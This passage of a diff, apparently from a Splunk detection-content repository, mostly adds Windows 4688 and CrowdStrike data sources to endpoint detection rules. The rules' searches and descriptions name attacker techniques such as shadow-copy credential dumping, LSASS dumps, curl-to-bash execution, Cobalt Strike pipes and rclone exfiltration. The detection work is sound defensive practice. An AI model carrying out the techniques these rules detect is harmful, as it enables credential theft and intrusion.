 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name != "*temp.dat*"
   Processes.process = "*runrun*" OR Processes.process = "*temp.dat*" by Processes.dest
diff --git a/detections/endpoint/cmd_carry_out_string_command_parameter.yml b/detections/endpoint/cmd_carry_out_string_command_parameter.yml
index f0a0066b9c..4566f7c623 100644
--- a/detections/endpoint/cmd_carry_out_string_command_parameter.yml
+++ b/detections/endpoint/cmd_carry_out_string_command_parameter.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of `cmd.exe /c` to execute c
   code execution, privilege escalation, or persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_cmd` AND Processes.process="*
   /c*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/cmd_echo_pipe___escalation.yml b/detections/endpoint/cmd_echo_pipe___escalation.yml
index 7a570dfb50..7f4267b42a 100644
--- a/detections/endpoint/cmd_echo_pipe___escalation.yml
+++ b/detections/endpoint/cmd_echo_pipe___escalation.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of named-pipe impersonati
   enabling further compromise and persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%*
   (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user
diff --git a/detections/endpoint/cmdline_tool_not_executed_in_cmd_shell.yml b/detections/endpoint/cmdline_tool_not_executed_in_cmd_shell.yml
index de29f57aea..eab3df9433 100644
--- a/detections/endpoint/cmdline_tool_not_executed_in_cmd_shell.yml
+++ b/detections/endpoint/cmdline_tool_not_executed_in_cmd_shell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where `ipconfig.exe`, `
   within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "ipconfig.exe"
   OR Processes.process_name = "systeminfo.exe" OR Processes.process_name = "net.exe"
diff --git a/detections/endpoint/cobalt_strike_named_pipes.yml b/detections/endpoint/cobalt_strike_named_pipes.yml
index 7c5eab3db4..b719d5f91b 100644
--- a/detections/endpoint/cobalt_strike_named_pipes.yml
+++ b/detections/endpoint/cobalt_strike_named_pipes.yml
@@ -14,7 +14,7 @@ description: 'The following analytic detects the use of default or publicly know
   this could indicate an active Cobalt Strike beacon, leading to unauthorized access,
   data exfiltration, or further lateral movement within the network.'
 data_source:
-- Sysmon EventID 17
+- Sysmon EventID 17 
 - Sysmon EventID 18
 search: '`sysmon` EventID=17 OR EventID=18 PipeName IN (\\msagent_*, \\DserNamePipe*,
   \\srvsvc_*, \\postex_*, \\status_*, \\MSSE-*, \\spoolss_*, \\win_svc*, \\ntsvcs*,
diff --git a/detections/endpoint/conti_common_exec_parameter.yml b/detections/endpoint/conti_common_exec_parameter.yml
index 0e6b843a59..8d5d490ba6 100644
--- a/detections/endpoint/conti_common_exec_parameter.yml
+++ b/detections/endpoint/conti_common_exec_parameter.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of suspicious command-
   downtime, and potential ransom demands.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process = "*-m local*"
   OR Processes.process = "*-m net*" OR Processes.process = "*-m all*" OR Processes.process
diff --git a/detections/endpoint/control_loading_from_world_writable_directory.yml b/detections/endpoint/control_loading_from_world_writable_directory.yml
index c5cfb4a44c..7347951756 100644
--- a/detections/endpoint/control_loading_from_world_writable_directory.yml
+++ b/detections/endpoint/control_loading_from_world_writable_directory.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances of control.exe loading
   over the affected system, leading to further compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=control.exe
   OR Processes.original_file_name=CONTROL.EXE) AND Processes.process IN ("*\\appdata\\*",
diff --git a/detections/endpoint/create_local_admin_accounts_using_net_exe.yml b/detections/endpoint/create_local_admin_accounts_using_net_exe.yml
index bf7a421242..4264233edf 100644
--- a/detections/endpoint/create_local_admin_accounts_using_net_exe.yml
+++ b/detections/endpoint/create_local_admin_accounts_using_net_exe.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects the creation of local administrator accounts using the net.exe command. It leverages Endpoint Detection and Response (EDR) data to identify processes named net.exe or net1.exe with the "/add" parameter and keywords related to administrator accounts. This activity is significant as it may indicate an attacker attempting to gain persistent access or escalate privileges. If confirmed malicious, this could lead to unauthorized access, data theft, or further system compromise. Review the process details, user context, and related artifacts to determine the legitimacy of the activity.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.user) as
   user values(Processes.parent_process) as parent_process values(parent_process_name)
   as parent_process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml b/detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml
index 73242cd06a..1e5abbd05b 100644
--- a/detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml
+++ b/detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects the creation or deletion of Windows shares using the net.exe command. It leverages Endpoint Detection and Response (EDR) data to identify processes involving net.exe with actions related to share management. This activity is significant because it may indicate an attacker attempting to manipulate network shares for malicious purposes, such as data exfiltration, malware distribution, or establishing persistence. If confirmed malicious, this activity could lead to unauthorized access to sensitive information, service disruption, or malware introduction. Immediate investigation is required to determine the intent and mitigate potential threats.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.user) as
   user values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by
diff --git a/detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml b/detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml
index 28aa70a853..b1c933f75b 100644
--- a/detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml
+++ b/detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the creation of an lsass.exe process
   an attacker could use the lsass dump to extract credentials and escalate privileges,
   potentially compromising the entire network.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 11
 search: '`sysmon` EventID=11 process_name=taskmgr.exe TargetFilename=*lsass*.dmp |
   stats count min(_time) as firstTime max(_time) as lastTime by dest, object_category,
   process_name, TargetFilename  | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
diff --git a/detections/endpoint/creation_of_shadow_copy.yml b/detections/endpoint/creation_of_shadow_copy.yml
index 7eceba4476..8f8a9ba2d2 100644
--- a/detections/endpoint/creation_of_shadow_copy.yml
+++ b/detections/endpoint/creation_of_shadow_copy.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation of shadow copies using
   risk to the integrity and confidentiality of the system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe
   Processes.process=*create* Processes.process=*shadow*) OR (Processes.process_name=wmic.exe
diff --git a/detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml b/detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml
index 95a7ef8d8d..70575f4245 100644
--- a/detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml
+++ b/detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects the creation of shadow copies using "wmic" or "Powershell" commands. It leverages the Endpoint.Processes data model in Splunk to identify processes where the command includes "shadowcopy" and "create". This activity is significant because it may indicate an attacker attempting to manipulate or access data unauthorizedly, potentially leading to data theft or manipulation. If confirmed malicious, this behavior could allow attackers to backup and exfiltrate sensitive data or hide their tracks by restoring files to a previous state after an attack.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_wmic` OR `process_powershell`
   Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name
diff --git a/detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml b/detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml
index 6cf0509fb1..52246deb24 100644
--- a/detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml
+++ b/detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml
@@ -15,6 +15,8 @@ description: "The following analytic detects the use of the copy command to dump
   the network, or accessing sensitive data."
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_cmd` (Processes.process=*\\system32\\config\\sam*
   OR Processes.process=*\\system32\\config\\security* OR Processes.process=*\\system32\\config\\system*
diff --git a/detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml b/detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml
index dcc09e8198..dbb443f677 100644
--- a/detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml
+++ b/detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml
@@ -9,6 +9,8 @@ description: |-
   The following analytic detects the creation of a symlink to a shadow copy, which may indicate credential dumping attempts. It leverages the Endpoint.Processes data model in Splunk to identify processes executing commands containing "mklink" and "HarddiskVolumeShadowCopy". This activity is significant because attackers often use this technique to manipulate or delete shadow copies, hindering system backup and recovery efforts. If confirmed malicious, this could prevent data restoration, complicate incident response, and lead to data loss or compromise. Analysts should review the process details, user, parent process, and any related artifacts to identify the attack source.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*mklink*
   Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name
diff --git a/detections/endpoint/csc_net_on_the_fly_compilation.yml b/detections/endpoint/csc_net_on_the_fly_compilation.yml
index 4468e9810d..c768549ae9 100644
--- a/detections/endpoint/csc_net_on_the_fly_compilation.yml
+++ b/detections/endpoint/csc_net_on_the_fly_compilation.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the .NET compiler csc.exe
   movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_csc` Processes.process
   = "*/noconfig*" Processes.process = "*/fullpaths*" Processes.process = "*@*" by
diff --git a/detections/endpoint/curl_download_and_bash_execution.yml b/detections/endpoint/curl_download_and_bash_execution.yml
index 0109178820..5f074c7b88 100644
--- a/detections/endpoint/curl_download_and_bash_execution.yml
+++ b/detections/endpoint/curl_download_and_bash_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of curl on Linux or MacOS sy
   further exploitation within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl
   (Processes.process="*-s *") OR (Processes.process="*|*" AND Processes.process="*bash*")
diff --git a/detections/endpoint/deleting_of_net_users.yml b/detections/endpoint/deleting_of_net_users.yml
index 56b579762c..aa2aa52505 100644
--- a/detections/endpoint/deleting_of_net_users.yml
+++ b/detections/endpoint/deleting_of_net_users.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of net.exe or net1.exe comma
   of adversarial actions, complicating incident response and forensic investigations.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.parent_process) as parent_process values(Processes.process_id)
   as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/deleting_shadow_copies.yml b/detections/endpoint/deleting_shadow_copies.yml
index 8c80cef2f6..ef98a61925 100644
--- a/detections/endpoint/deleting_shadow_copies.yml
+++ b/detections/endpoint/deleting_shadow_copies.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the deletion of shadow copies using
   promptly.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe
diff --git a/detections/endpoint/detect_azurehound_command_line_arguments.yml b/detections/endpoint/detect_azurehound_command_line_arguments.yml
index 878510f5e2..23fd528463 100644
--- a/detections/endpoint/detect_azurehound_command_line_arguments.yml
+++ b/detections/endpoint/detect_azurehound_command_line_arguments.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of the `Invoke-AzureHo
   structures, aiding in further attacks and privilege escalation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*invoke-azurehound*")
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/detect_certify_command_line_arguments.yml b/detections/endpoint/detect_certify_command_line_arguments.yml
index 52dd482e6e..54c5cf2e88 100644
--- a/detections/endpoint/detect_certify_command_line_arguments.yml
+++ b/detections/endpoint/detect_certify_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Certify or Certipy tools
   escalating their privileges within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("* find
   *","* auth *","* request *","* req *","* download *",) AND Processes.process IN
diff --git a/detections/endpoint/detect_certipy_file_modifications.yml b/detections/endpoint/detect_certipy_file_modifications.yml
index ea93660b54..7b19537648 100644
--- a/detections/endpoint/detect_certipy_file_modifications.yml
+++ b/detections/endpoint/detect_certipy_file_modifications.yml
@@ -14,8 +14,7 @@ description: The following analytic detects the use of the Certipy tool to enume
   malicious, this could lead to unauthorized access to sensitive AD CS information,
   enabling further attacks or privilege escalation within the network.
 data_source:
-- Windows Event Log Security 4663
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
   AS lastTime values(Processes.process_current_directory) as process_current_directory
   FROM datamodel=Endpoint.Processes where Processes.action="allowed" BY _time span=1h
diff --git a/detections/endpoint/detect_computer_changed_with_anonymous_account.yml b/detections/endpoint/detect_computer_changed_with_anonymous_account.yml
index c0009a11d9..c0e053fe2b 100644
--- a/detections/endpoint/detect_computer_changed_with_anonymous_account.yml
+++ b/detections/endpoint/detect_computer_changed_with_anonymous_account.yml
@@ -13,7 +13,8 @@ description: The following analytic detects changes to computer accounts using a
   If confirmed malicious, this could allow an attacker to alter computer accounts,
   potentially leading to privilege escalation or persistent access within the network.
 data_source:
-- Windows Event Log Security 4624
+- Windows Event Log Security 4624 
+- Windows Event Log Security 4742
 search: '`wineventlog_security` EventCode=4624 OR EventCode=4742 TargetUserName="ANONYMOUS
   LOGON" LogonType=3 | stats count values(host) as host, values(TargetDomainName)
   as Domain, values(user) as user | `detect_computer_changed_with_anonymous_account_filter`'
diff --git a/detections/endpoint/detect_exchange_web_shell.yml b/detections/endpoint/detect_exchange_web_shell.yml
index da8c1f8422..940893d70b 100644
--- a/detections/endpoint/detect_exchange_web_shell.yml
+++ b/detections/endpoint/detect_exchange_web_shell.yml
@@ -14,8 +14,7 @@ description: 'The following analytic identifies the creation of suspicious .aspx
   attackers could gain unauthorized access, execute arbitrary commands, and potentially
   escalate privileges within the Exchange environment.'
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name=System  by _time span=1h Processes.process_id Processes.process_name
   Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid,
diff --git a/detections/endpoint/detect_html_help_renamed.yml b/detections/endpoint/detect_html_help_renamed.yml
index 60171a55be..96c1c6504d 100644
--- a/detections/endpoint/detect_html_help_renamed.yml
+++ b/detections/endpoint/detect_html_help_renamed.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances where hh.exe (HTML Help) h
   posing a significant security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=hh.exe
   AND Processes.original_file_name=HH.EXE by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/detect_html_help_spawn_child_process.yml b/detections/endpoint/detect_html_help_spawn_child_process.yml
index f0f773852e..0bf59fa7b4 100644
--- a/detections/endpoint/detect_html_help_spawn_child_process.yml
+++ b/detections/endpoint/detect_html_help_spawn_child_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of hh.exe (HTML Help)
   the system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=hh.exe
   by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/detect_html_help_url_in_command_line.yml b/detections/endpoint/detect_html_help_url_in_command_line.yml
index 4c4b6b1eb6..39e6d921f4 100644
--- a/detections/endpoint/detect_html_help_url_in_command_line.yml
+++ b/detections/endpoint/detect_html_help_url_in_command_line.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of hh.exe (HTML Help)
   like JScript or VBScript, leading to further system compromise or data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*http*
   by Processes.dest Processes.user  Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml b/detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml
index 698a35211c..c12f5cc105 100644
--- a/detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml
+++ b/detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of hh.exe (HTML Help)
   within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process
   IN ("*its:*", "*mk:@MSITStore:*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/detect_mshta_inline_hta_execution.yml b/detections/endpoint/detect_mshta_inline_hta_execution.yml
index af7f3f9e8b..06028fdf06 100644
--- a/detections/endpoint/detect_mshta_inline_hta_execution.yml
+++ b/detections/endpoint/detect_mshta_inline_hta_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of "mshta.exe" with in
   security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process=*vbscript*
diff --git a/detections/endpoint/detect_mshta_renamed.yml b/detections/endpoint/detect_mshta_renamed.yml
index b158d5c8be..e9ec5aeee1 100644
--- a/detections/endpoint/detect_mshta_renamed.yml
+++ b/detections/endpoint/detect_mshta_renamed.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where mshta.exe has bee
   data exfiltration, or further lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=mshta.exe
   AND Processes.original_file_name=MSHTA.EXE by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/detect_mshta_url_in_command_line.yml b/detections/endpoint/detect_mshta_url_in_command_line.yml
index 185cb9a885..3ae2c2e361 100644
--- a/detections/endpoint/detect_mshta_url_in_command_line.yml
+++ b/detections/endpoint/detect_mshta_url_in_command_line.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of Microsoft HTML Applicatio
   leading to system compromise, data exfiltration, or further network infiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process="*http://*"
diff --git a/detections/endpoint/detect_new_local_admin_account.yml b/detections/endpoint/detect_new_local_admin_account.yml
index f85f0831f8..3713d9963f 100644
--- a/detections/endpoint/detect_new_local_admin_account.yml
+++ b/detections/endpoint/detect_new_local_admin_account.yml
@@ -8,7 +8,7 @@ type: TTP
 description: |-
   The following analytic detects the creation of new accounts elevated to local administrators. It uses Windows event logs, specifically EventCode 4720 (user account creation) and EventCode 4732 (user added to Administrators group). This activity is significant as it indicates potential unauthorized privilege escalation, which is critical for SOC monitoring. If confirmed malicious, this could allow attackers to gain administrative access, leading to unauthorized data access, system modifications, and disruption of services. Immediate investigation is required to mitigate risks and prevent further unauthorized actions.
 data_source:
-- Windows Event Log Security 4732
+- Windows Event Log Security 4732 
 - Windows Event Log Security 4720
 search: '`wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators)
   | transaction src_user connected=false maxspan=180m | rename src_user as user |
diff --git a/detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml b/detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml
index dc47120c0d..54570dfcff 100644
--- a/detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml
+++ b/detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml
@@ -13,8 +13,7 @@ description: The following analytic identifies the execution of `outlook.exe` wr
   data access, data exfiltration, or the delivery of malware, potentially compromising
   the security of the affected system and network.
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly`  min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=outlook.exe
   by _time span=5m Processes.parent_process_id Processes.process_id Processes.dest
diff --git a/detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml b/detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml
index 285f004d82..13e0540cab 100644
--- a/detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml
+++ b/detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the creation of a program execut
   control over the affected endpoint.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe
   by Processes.user Processes.process_name Processes.parent_process_name Processes.process
diff --git a/detections/endpoint/detect_processes_used_for_system_network_configuration_discovery.yml b/detections/endpoint/detect_processes_used_for_system_network_configuration_discovery.yml
index 349a349275..34ed7012f3 100644
--- a/detections/endpoint/detect_processes_used_for_system_network_configuration_discovery.yml
+++ b/detections/endpoint/detect_processes_used_for_system_network_configuration_discovery.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the rapid execution of processes
   system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where NOT Processes.user
diff --git a/detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml b/detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml
index 97d75ed7dd..42b3afa82c 100644
--- a/detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml
+++ b/detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic detects executions of cmd.exe spawned by pro
   within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where `process_cmd` by Processes.parent_process_name Processes.process_name Processes.original_file_name
diff --git a/detections/endpoint/detect_psexec_with_accepteula_flag.yml b/detections/endpoint/detect_psexec_with_accepteula_flag.yml
index 3eeaf9e622..7425d35887 100644
--- a/detections/endpoint/detect_psexec_with_accepteula_flag.yml
+++ b/detections/endpoint/detect_psexec_with_accepteula_flag.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `PsExec.exe` wit
   to further system compromise and lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where `process_psexec` Processes.process=*accepteula* by Processes.dest Processes.user
diff --git a/detections/endpoint/detect_rare_executables.yml b/detections/endpoint/detect_rare_executables.yml
index ea623d3505..f57cfa9c70 100644
--- a/detections/endpoint/detect_rare_executables.yml
+++ b/detections/endpoint/detect_rare_executables.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rare processes that
   impact.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` dc(Processes.dest) as dc_dest values(Processes.dest)
   as dest values(Processes.user) as user min(_time) as firstTime max(_time) as lastTime
   from datamodel=Endpoint.Processes by Processes.process_name | `drop_dm_object_name(Processes)`
diff --git a/detections/endpoint/detect_rclone_command_line_usage.yml b/detections/endpoint/detect_rclone_command_line_usage.yml
index 29882711c6..4f19089aa9 100644
--- a/detections/endpoint/detect_rclone_command_line_usage.yml
+++ b/detections/endpoint/detect_rclone_command_line_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the usage of `rclone.exe` with speci
   the affected endpoint and further investigation are recommended.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rclone` Processes.process
   IN ("*copy*", "*mega*", "*pcloud*", "*ftp*", "*--config*", "*--progress*", "*--no-check-certificate*",
diff --git a/detections/endpoint/detect_regasm_spawning_a_process.yml b/detections/endpoint/detect_regasm_spawning_a_process.yml
index 1bdfb85536..3c1cbc05e1 100644
--- a/detections/endpoint/detect_regasm_spawning_a_process.yml
+++ b/detections/endpoint/detect_regasm_spawning_a_process.yml
@@ -16,6 +16,8 @@ description: The following analytic detects regasm.exe spawning a child process.
   activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regasm.exe
   NOT (Processes.process_name IN ("conhost.exe")) by Processes.dest Processes.user
diff --git a/detections/endpoint/detect_regasm_with_no_command_line_arguments.yml b/detections/endpoint/detect_regasm_with_no_command_line_arguments.yml
index 7efb79d1c9..24689955db 100644
--- a/detections/endpoint/detect_regasm_with_no_command_line_arguments.yml
+++ b/detections/endpoint/detect_regasm_with_no_command_line_arguments.yml
@@ -16,6 +16,8 @@ description: The following analytic detects instances of regasm.exe running with
